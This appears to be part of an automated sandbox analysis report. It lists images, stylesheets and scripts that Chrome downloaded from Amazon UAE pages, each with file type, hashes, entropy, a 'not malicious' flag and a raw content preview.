                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................,..-.kh.6.....h.E.J..*.....R.7...-.|=U~....9.......w............x.....^.u.K..yY^;.......IV...=NY.....g`.....D.7A..s..>..o%.S..zc.....z.....o=..7s.a..........-y....].N.ef..'Hl}b.I.f]g_.,.i.{Q......(s..we.6A...n...4.I....y...5..z=..s..p3.......e.B5..w.y.o.../.SN...,.....k......#v&.....P.....k.....%.........a..+&.~w...n.zy..16...../...'.k..../...................v.PP.....9..Y ....X.......\.F........<&.....l.........z..W.d.>,....].N.8y_S.....ii.?.._a:.......94.i.&...G....3..~....^.....K.'C...k.N........@......y.a........_m1.*.}MoG..&\.:.........TG....2..h..............................!1...2@ AB."3Q0.#$Pq............J.z.V.U.c... ........h..f.E.,.-M.@....ZZ..^...(&.....L..+.l7t...K&..x.?t.!.z......:..M.... ..(..J
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):23
                                                                                                                                                                                                                                                                Entropy (8bit):4.175735869100492
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:VXciJ:hD
                                                                                                                                                                                                                                                                MD5:C7D3355DDAC8D35912F6CB56C4BE6ECA
                                                                                                                                                                                                                                                                SHA1:4ECB85CA8A4B633FE7DB11B2B7591AF83A89D406
                                                                                                                                                                                                                                                                SHA-256:88EA58255D4CD82340F7ACAABE0E6A99F195A4DC2CA6EF56EC503D03B331BEE5
                                                                                                                                                                                                                                                                SHA-512:8164D943F11F6559A8AB31869676FD4801E6E8C18DF05B53EF2F5CE5EC23BD632E66018EC134DA658289B6FA4C2BA15EF47DCF6210866457CFA7DEDB45994272
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:window.ue_adb_chk = 1;.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1604), with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1604
                                                                                                                                                                                                                                                                Entropy (8bit):4.92686759147884
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:gS54Y/P6X1k+Y/iX1e0cE+YqeFyjE05fkJ:oYa1kS1dit8
                                                                                                                                                                                                                                                                MD5:44E64D3C3BA4BE6C2CF38A32214956C5
                                                                                                                                                                                                                                                                SHA1:51EBBE66955F53B41A6EF059CFA60BBAA6510090
                                                                                                                                                                                                                                                                SHA-256:FDE9D2DA8DB0410AC9ED2E51A140FFBEF14C4CCB729519D441E10B224765F0DF
                                                                                                                                                                                                                                                                SHA-512:AA008E049C5AFE1DEE9CA8FA5F07474A249481831D807B3A4B45661C4FD453D241E2DC5BFDBA623FC54B02AE1694A2FF644BE86110CD9686AA31ADFC10482079
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/01NdXlDE17L.css?AUIClients/InContextAuthBaseAssets
                                                                                                                                                                                                                                                                Preview:#in-context-auth-sidesheet{z-index:298;overflow-y:auto;position:fixed;top:0;bottom:0;left:0;right:0}#in-context-auth-sidesheet-overlay{display:block;position:absolute;top:0;bottom:0;left:0;right:0;background:#0F1111;opacity:.4;cursor:pointer}#in-context-auth-sidesheet-content{position:fixed;right:-700px;left:auto;width:470px;bottom:0;z-index:298;margin:0;background-color:#FFF;border-width:0;top:0;box-shadow:-4px 0 5px rgb(0 0 0 / 25%);overflow-wrap:anywhere;padding:72px 24px 24px}html[dir=rtl] #in-context-auth-sidesheet-content{position:fixed;left:-700px;right:auto;width:470px;bottom:0;z-index:298;margin:0;background-color:#FFF;border-width:0;top:0;box-shadow:-4px 0 5px rgb(0 0 0 / 25%);overflow-wrap:anywhere;padding:72px 24px 24px}html[lang=ja-jp] #in-context-auth-sidesheet-content{width:565px!important}#in-context-auth-sidesheet-close-button{cursor:pointer;z-index:500;position:absolute;right:35px;top:34px;width:28px;height:28px}html[dir=rtl] #in-context-auth-sidesheet-close-button{cu
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1058
                                                                                                                                                                                                                                                                Entropy (8bit):0.9214142617568999
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:HN/NFd1/NvXvXvXvFvNvf1/3/VXvXvXvXvFvNvfV/dN/NvXvXvXvFvNvfd/9F9v/:H
                                                                                                                                                                                                                                                                MD5:CF33BE25A097E090CB42072D777D2A5C
                                                                                                                                                                                                                                                                SHA1:DA11FA1A2B38AE4EA169A2495BBD41A24862C1A1
                                                                                                                                                                                                                                                                SHA-256:CA2E9849B8FD0642A96B9BF99E86DF15AB1F3F8C540A7D6FCB13A05EA3B70675
                                                                                                                                                                                                                                                                SHA-512:DCFB27E331380D8885AE6800A190C35D3CD7ADEDF56B24ACEAF2CBEE02550DFBC74924D1327B246E21CCB322E6E2EFED0211EBB6174BD6106592DA7F06AE2670
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/gp/buy/prefetch/store-html.html
                                                                                                                                                                                                                                                                Preview:.... . ............... . . . . . . . ............................................................................................... ... . . . . . . . ........... .... . . . . . . . .................. . . . . . . . . ........... ................................ . . ............................................................... . . . . . . . .................. .. . . . . . . ........... ..................................................... ............................................................................................................................................. . ........................ ......................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):18143
                                                                                                                                                                                                                                                                Entropy (8bit):7.941018953150089
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:9XRg+yopCktpxnQragCuiCuXt6Q/6rhb2a06mOWSvSyihFBDR41FcrSiox10:p3jrVnQragCFCDB2dROtnih7R4UrS1y
                                                                                                                                                                                                                                                                MD5:B6307FE06202A8E7B69A6961FA473ED7
                                                                                                                                                                                                                                                                SHA1:F61C6D31D05F4AB4EC5DBBF4A9A25D59D111C0D4
                                                                                                                                                                                                                                                                SHA-256:5C2E7B690BB8A797CF7B3164720602F4773C2A9C78253A4C16474839FE8E9848
                                                                                                                                                                                                                                                                SHA-512:7DB047247A881B679CE48DE0D48EF580E2F66D1842C99C6937FBB2980D89FDF8A12DFF789D55A9D98323EBE8CC80C898E448C5210EF959228A029FBD2E4E416D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5........................................................................v.Z..[.X].f....j..f...j.I..e.6..<.k73e..../$.....?.I.7.\.............s.?+..0..T.{.r.}.Q...Jp_....k3.R<....{,^bz.@x.U.H...i0..E|..n....[...r.Fo...s!.<...........[<..k.Z.D.!....c)...j...p..{..l.;......n..=..n.N.w....W1).M._.......M..V/.Z.....-............l..9ju.P[...S..e........_....EU.x..r...^..<......?ESg..]..u.6n......z.oT6..W...X..........-.r.5.-N...|..Y^.`...g[.e.i:5N..2.y....t..../`.....o.#p.....q....E....6.nm../.............[<..k..N.}.o.o&......n...V9.|4Sex.27.-E.e..y......3.<.../.^y.I...<V_m\(...i&...r.............Q...C.a.........+|......g.<....*q..c).!.....w....Vsa....di..[.Vm..D4.p.U.?...s.n.@...........:a.:.[..H.7..}..:...u...fA..(.;/.8<.3..C....8X....P.SR...}GM?f9....v.....,.............Y..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1438
                                                                                                                                                                                                                                                                Entropy (8bit):7.4301903007245205
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:TRe+0CmRdRaN9HFntvWdRJgVuSUy7IrLZeRMT9zZEkCuR1C7BMOqrr:TT0rTRm9lt+xg/WLZe6IraXH
                                                                                                                                                                                                                                                                MD5:77F93C1FDBAFC67AE8AFF833FFEBF1CC
                                                                                                                                                                                                                                                                SHA1:176864A0C17A47414D7C0B7D503753229D3677EB
                                                                                                                                                                                                                                                                SHA-256:AA644C37917FCBCA55F6F942F6E6C72D065C8A25A6DA0F33D3CFA66DA76AC5AB
                                                                                                                                                                                                                                                                SHA-512:C0E7FCF6B99A1F1DDA0219309512CB10877C8325A0D121FA88690D50B84E75AF90BECAC2ADF438E3964B7474883FAB9FCD723EEEE8AA3AF57ACF8CFCCEFFD700
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!..1AQa..."#Rbq..$.................................................!1."#2Aa............?............T..4j.T..A..n6.{...U....*..4\|4.MgB...;...y....L..w.gS>U.................w...X.M.iv;J...t......#..m.{~..ce.?O..o..Tf.:%.V............d..W8C.kz.(/..}..CB......j<S....%.]..g...$...D..............P8Nj.........G.P..=....&..tD.3..K.p..o}.v........&...=.k..|..a.>.c.]wOw%..p./.....y...[..k.e..}6<..w..Q..p.Q.&..e.+".....u.u9N.T...%(.kri........\..... ........R.@..W:....m.....Y..d......................I>..Oj....vM.6..e.....*.c...nyj..nSWj7J...RQ.Si.7..._d......s..|M..}...'..+...\.s...?..t..8.s....m....z..Y.h.c.5..I...g..w...'q@.............1........W..u.......bQ.x.#.!/X....._F.Y...F.~.k|...I .....|...X,..<..._..TR.#.#..<.f.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2505
                                                                                                                                                                                                                                                                Entropy (8bit):7.57821258014142
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:Q49FzEk6I87i/7btk9QTMYQuBBeCx+jkgfotZzVKOQ5J04/3JQA2v:/9hEkUi/ZMGJ3QJZwn
                                                                                                                                                                                                                                                                MD5:002622B77205566964885B74BF6DFED2
                                                                                                                                                                                                                                                                SHA1:5ADD68A03B70A9AB3C6942F7211CC81F413FDC9B
                                                                                                                                                                                                                                                                SHA-256:42EAAEC6B2FC15562C3616C2C1510B7C9F37E2FB6908C21956DCE1CA6076EAAC
                                                                                                                                                                                                                                                                SHA-512:5BF09C3AFB54BBD6ABB0C1B78796E79A5D6477BCD0D8756820990842F315A1CF30F1BCE0CDBA03A6326841ACD294EBCF7E5B4AE8F35FCF4AA9C69AD2313057BD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........8........................................................................7...........8s.t..F.....T..-.T......Dyo}.NFw......*...*.}n..)..=.).*....:..../F.O.........._...<Ye}....2...p.C...j.E....F...........UG..J..l.. ....q.r.-.u....<.Q........ .j...A.|-L.y${.....-...Q..Z.n8p......3?.o./D...h.t..X......._...............P.............................!.$1@EUa..%45ATdu......&DFPQeqv.........6GV..............?..c6.........oKY(...o...x...JD....3.-_hz.Ih...1....4j....>?L;.....l.U..S&.L..FC.}m..x~Y.-h.K_F)%M\.Z..\.......T^}}...7.}.j..=...B........$.....&......|.........nF6R.,5b..Q.M.8.uQ...ui......^........1.c\.."..M.nA..(L ..Z...7..j...m.&...........*...E.$.Gv.......Y..p@Bc...,...6("'.6...F.f.&..bH.+..Q....K..}#1..P...d%...m..O_/.s3..=C0..9..K.J~U.q]...~...........&..G...S.`....O...u}._.....)
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2215
                                                                                                                                                                                                                                                                Entropy (8bit):7.780080651712038
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r1bmS1J7o9AQuSJ4KkxZjG97evR+z22pbK3PzcGCSdbbbbR:TmDsCQXJUjG97E+FhK3Pz7bbbbR
                                                                                                                                                                                                                                                                MD5:6A20D8C3C1C584CBDBFD7BF6376F07B2
                                                                                                                                                                                                                                                                SHA1:09ED213ED35E8553E1279F920A6BC2878F9010F7
                                                                                                                                                                                                                                                                SHA-256:30DA63A92210E0B20817E57EAF2789A5B4DC9895703298A0083E52799C1B7338
                                                                                                                                                                                                                                                                SHA-512:F735DE0A33BE1DEAD940B2B7A9F734E018D7189325EDD586CFB05603A0B9EB6C4E3132375C3AE29087259A7B7735790D50529F73A23D2FB6C9DCAD14E5E3BF4C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!.1A..2Qa."qr..BR..#3T.....%S..............................................1.A............?............../...<..1..s......1.LEZ.{G{.c.{.....F..^.......E9y.....5..N...[8.._.H.i..M./....W....&TSJ.b..F8=...}...............5..<X.?...]c.SI.E.=.6.'...U.a.9(.C\k+...l....D.q...m8=.;.3'.4.`..=LL9..B!.JJ(.A-...J.e..w1.......Q*k.~..k3..ANG./Y|..^......U......u.#Id}CK.`..j.v...%.e-... .....G...8...z..i.T...D.`..2&.......'2W....R.n....C/.I.V....m.v#.R.:..#.a*.5...R<.|.bf....l.VK.a.,OC5.... ..z7t{}B.....W..Ps|..,g.Q.1.../N..T........DNn..G...I.1..l..h.....f..$?..wo_.v..T.""." ""." *}.G...{=..*h..}.Hr`W.k....Ub.\.|,..6.`..n...!...s.I.N.z...v._..a..0...{3{.>2*#.l8q6 .P..I..y.#...hh.h.4..........}.,..[i.F.i._.-..\E.{FE.....U2.I....v@....6<...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 1500 x 100, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):16556
                                                                                                                                                                                                                                                                Entropy (8bit):7.961989012448859
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:kPTrcEPVmm1FDDTCzBkt34iMxJdg85dFVAvzyNre64IF:UTrHPlnCzBGFMzf5ETQ
                                                                                                                                                                                                                                                                MD5:7976490D90D2616AD467D5D9FED797C5
                                                                                                                                                                                                                                                                SHA1:44584DBEFD97834892F8A9FF846994746A62BA63
                                                                                                                                                                                                                                                                SHA-256:3591CEE8B7E2D2FFF0F13578B0963FB45C67B8246D592F586865A80B64BFA527
                                                                                                                                                                                                                                                                SHA-512:79FAF658C6FD3CA13129CE172D0F313FE973F4CF77F43A874483B8F3230DE02D851948EB252FD6B5353E490F22EB786CFD9058964CDA21E373B465979BFB8CEB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UFG_AE/Prime/Combined_Learn_More_signup_en_AE.png
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.......d......J......gAMA......a.....sRGB.........pHYs..........+......PLTE#/>B. 5I....~..Hm.~......?.c........Jm...V....]..j..w.......p..Oy.<T...........f...Ca.....x].iN......k.gL...vZ.sX..c..j...lQ.|a.{^...<V...p^..e.iW...kU....m.eH......h...~...nW.qU.Z<.`C.bH.dR....h.nS.hT.~b....kZ...gU....m\.kY.Cb.........^J.Y?..... ..h.y..mY.U9.Q}.aO.8...td.^B....qY........#..?1+'[[%...t[..o..]F:...q..YE.u..e.q....hU........,!..`..o.kOB0.x.dR..Q>5.|f...P5...bN.9Q3'".cTrVGjC0!9E..s....m....paH81.....!2D.[I%MW..#%&K1$...#CMZ:*..x..\QG.Q<4..U.."0@...?.....xc.x..n..i&.....v]OwK7H..jX......?\754...:...j\.Mu=).B..[YW"..v^T.......v...f.+Yn6..-,+.u....=..Gh2...)2.Z.....|......@AB.{.3..'07...)fc..y.......p,rj...h..IXa....._p.~.....LHF/o.m....Z....qrs...eca...3e~.}r.h.C..`~.l..Iz.L|....... .IDATx..[h.W...\l...Yl.......A.~(..Dkbh......N...d7&.`...um...~h.e.a.Ih.lJ..FIBC7.v...Q.l...}.s.".3.YJ......3c..wn...w>..A ...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D34810%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41613
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (523)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9763
                                                                                                                                                                                                                                                                Entropy (8bit):5.5576256209320105
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:6U7KggJdFc65eODBRWPWVJfZZ4CD7N1bNa+AqDWzEF7jTwT8U:6U7Knz5eiBRhVjvriYlU
                                                                                                                                                                                                                                                                MD5:6EED3151A81957F00C3AA5AD97F78CAB
                                                                                                                                                                                                                                                                SHA1:6C0E9AD0ACB70ECB40B78B05CC7273D5FF882C97
                                                                                                                                                                                                                                                                SHA-256:8A1CA9608771693D06B0109E1E442D495DA603F32182A6527F9F1026C84780E9
                                                                                                                                                                                                                                                                SHA-512:92462B00575FE2B761D3159F7ACE5D5FF4C56B71228925B187FEF8E164D5F8C4354215AC2BEF26F0532AA162257AEF285C8EEB902F4EFF187FD9DA8FCCBBE98A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(c,m){function y(a){if(a)return a.replace(/^\s+|\s+$/g,"")}function x(a,g){if(!a)return{};var b="INFO"===g.logLevel;a.m&&a.m.message&&(a=a.m);var f=g.m||g.message||"";f=a.m&&a.m.message?f+a.m.message:a.m&&a.m.target&&a.m.target.tagName?f+("Error handler invoked by "+a.m.target.tagName+" tag"):a.m?f+a.m:a.message?f+a.message:f+"Unknown error";f={m:f,name:a.name,type:a.type,csm:N+" "+(a.fromOnError?"onerror":"ueLogError")};var h,l=0;f.logLevel=g.logLevel||A;g.adb&&(f.adb=g.adb);if(h=g.attribution)f.attribution=.""+h;if(!b){f.pageURL=g.pageURL||""+(window.location?window.location.href:"")||"missing";f.f=a.f||a.sourceURL||a.fileName||a.filename||a.m&&a.m.target&&a.m.target.src;f.l=a.l||a.line||a.lineno||a.lineNumber;f.c=a.c?""+a.c:a.c;f.s=[];f.t=c.ue.d();if((b=a.stack||(a.err?a.err.stack:""))&&b.split)for(f.csm+=" stack",h=b.split("\n");l<h.length&&f.s.length<F;)(b=h[l++])&&f.s.push(y(b));else{f.csm+=" callee";var m=z(a.args||arguments,"callee");for(h=l=0;m&&l<F;){var v=G;m.skipTr
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2354
                                                                                                                                                                                                                                                                Entropy (8bit):7.576520167279231
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0ruiOywWjtxyVy/vu1xl0imygBbcNlNVUtHfbn1PlIbnDr:TATwWjzygvriEcLYFzF+
                                                                                                                                                                                                                                                                MD5:F9693F75DADDCF1912457687A2AFCB0E
                                                                                                                                                                                                                                                                SHA1:0D737375752CC7967C283C1F6A1BD52334D14DB8
                                                                                                                                                                                                                                                                SHA-256:3644EAFCEC7716EE6AA611E08D4845B02B9E36423588FE3242DE37891F289FA9
                                                                                                                                                                                                                                                                SHA-512:4E45DAAB5EDDDBC2382A33D34A7CB9AF503748ABB071D19AE3748AD5F190B6156D2FA0D2EFAB2282DED364A577BB8AE476E210170DAA759DE76B1823C86202C4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................1..!..Rs.."2AQabq......5BTU....#$3C%&4cr....................................................1.!"Ar.23q5..............?...........H.eR.6..2...e...C..}]....M/k5.....3./q..Uc..R.......[......L..'b|.\..{3..>.4|@.f8...C....@.i.......................1.-YQNv..wl..w.......u#..F9..]..G.q#..@.NFc##.c.0$n...#s.c.0$..YT..@.b3.J.d...................RS......|;....-dj....2.u.N.9.:F9.>."...0i+.S.1.)...x.g`.g6..5xzd\.f`.W7.G..Q.s'....L9_T...t..=.T..../..9.....v$.RW..;.u.........................>.z2....eT..eT..L5>Y.......{.B.SU2......Q..X.ti.u)..()...j:.)..X.:.........~...........?w~.....w....Q...%*i.-..gk............q.#.:u.NSpk..S...~Vz..:n7......Z.x...../...o..T.(.d.G....8...?,l.U.....)a.Mbd..Q...y..C.'b.._...-..{.g.-...1.8.^-....{."w3.}"...F.k
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (700)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):11064
                                                                                                                                                                                                                                                                Entropy (8bit):5.441770530180272
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:ZGvlbAoUi6Dg2E5WhZzhlldp9DYBzL1XunwBwHZJwV20z9jy+5gtPRmy3zWD1o56:Z2lzUib52VlD9MBzL1XunqU70ZeAgtJ0
                                                                                                                                                                                                                                                                MD5:61FBE1FD8BDA9F4C5831EF41949F3103
                                                                                                                                                                                                                                                                SHA1:51486CA39D68E3CA2F71C5EC45EBFFE822452669
                                                                                                                                                                                                                                                                SHA-256:44DE0115C98F76788D4432A94F09B481D9339F5E4053017801E06C59F3EA9E18
                                                                                                                                                                                                                                                                SHA-512:E2C365799A9C00B59FE03C24AB090405AE496F069F49612E1930700A0249748BAC8B234DA8038362EB087E7D3DDAB665E0042541E165A88F2865380F248077AA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:'use strict';mix_d("P13NSCCards__p13n-rvi:p13n-rvi__6bjMpsfo","exports tslib @p/A @c/metrics @c/aui-carousel @c/dom @c/remote-operations @c/scoped-dom @p/a-carousel-framework @c/logger @c/aui-untrusted-ajax @c/browser-operations".split(" "),function(B,u,G,y,H,I,J,K,L,M,N,O){function w(a){return a&&"object"===typeof a&&"default"in a?a:{"default":a}}var n=w(G),P=w(H),Q=w(J),v=w(K),R=w(L),x=w(M),S=w(N),T=w(O),C={},z=function(a,d,b){void 0===d&&(d="");void 0===b&&(b=1);d=a+d;C.hasOwnProperty(d)||(C[d]=.!0,y.count(a,(y.count(a)||0)+b))},U=function(a){z(n["default"].capabilities.mobile?"Card:EERU:SharedLib:mobile:render":"Card:EERU:SharedLib:desktop:render");var d=function(c,e){c={$event:{preventDefault:n["default"].$.noop,stopPropagation:n["default"].$.noop},$target:c.getContent().find('[data-a-tab-name="'+e+'"]'),data:{name:"energyEfficiencyTabSet"}};n["default"].trigger("a:declarative:a-tabs:click",c)},b=function(c,e){var h=c&&c.$event,f=c&&c.data||{},p=f.activeTabName,l=f.modalHeight,r=f
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 180x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):13838
                                                                                                                                                                                                                                                                Entropy (8bit):7.974316029208808
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:2SGwQAsAs6Skq1mI0KkgeECdbroJ9xFO0siCLER4zEsyjw3Xgd/7ITPpyG/zb2MS:ds7rkamIVeEKkdU/PzEsyYgdgTRxA
                                                                                                                                                                                                                                                                MD5:6AAF5E10CFA592DF24715477CCD1A58D
                                                                                                                                                                                                                                                                SHA1:BA746FFCB4292B10F7FE0179BBD31289259D8835
                                                                                                                                                                                                                                                                SHA-256:A1271E50D554AACF249BF37636CE4365226DD11F938FCBD0E1CFCB2DECDFEE2A
                                                                                                                                                                                                                                                                SHA-512:EBE4E5AAC875961119AD82323B8A25F97077D2DD84BDB5468319667F55EA5D3BCDB9A9358BBBCE2685568C5AB8C88A6914417154CCD5F0A33BC9BFA96762E6A2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!.1.."A.Qa.#2Bq....$3CRr..S...........%4DETst..................................................!1...AQa"q..2...#B...$4Rb...............?..---t..N.o.z,.E!..|H......J..e...C..H.........."B..jD%5.V@L...:4.J.........;..vn...:.].<"YC].......B._.V..*...X.)R.#%....ew....R=4.1..vu..-..f.bC..z2..PT0.+k]5.6..O...Dk.....<g...&....U_.?4.....=WZ...z.G&...,U6.b_...X...{.........$C.X...G/.*<i.._\23...5.(X.T.....W.......T...'...F*U.TQ#oQ.E...z{..X..x.V....,P.....iy .$..h....r......u.1.Z.z.].....q>....u...'x$.T~..$...U[w.....v}..m$.F.D$.....l..p..Z...g.r.....".pHV./..S..J.y7..y.?.g%.Lg.{<f5_..e.OsUz..52..gQ.....e...2.f!....*....F.8.a".`9U.j...Yj..........`.....L....vy-vj..`..F.......i.S.....K.........H.3.[.]1|..00-.....|.....l9.E.......f.,.s
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
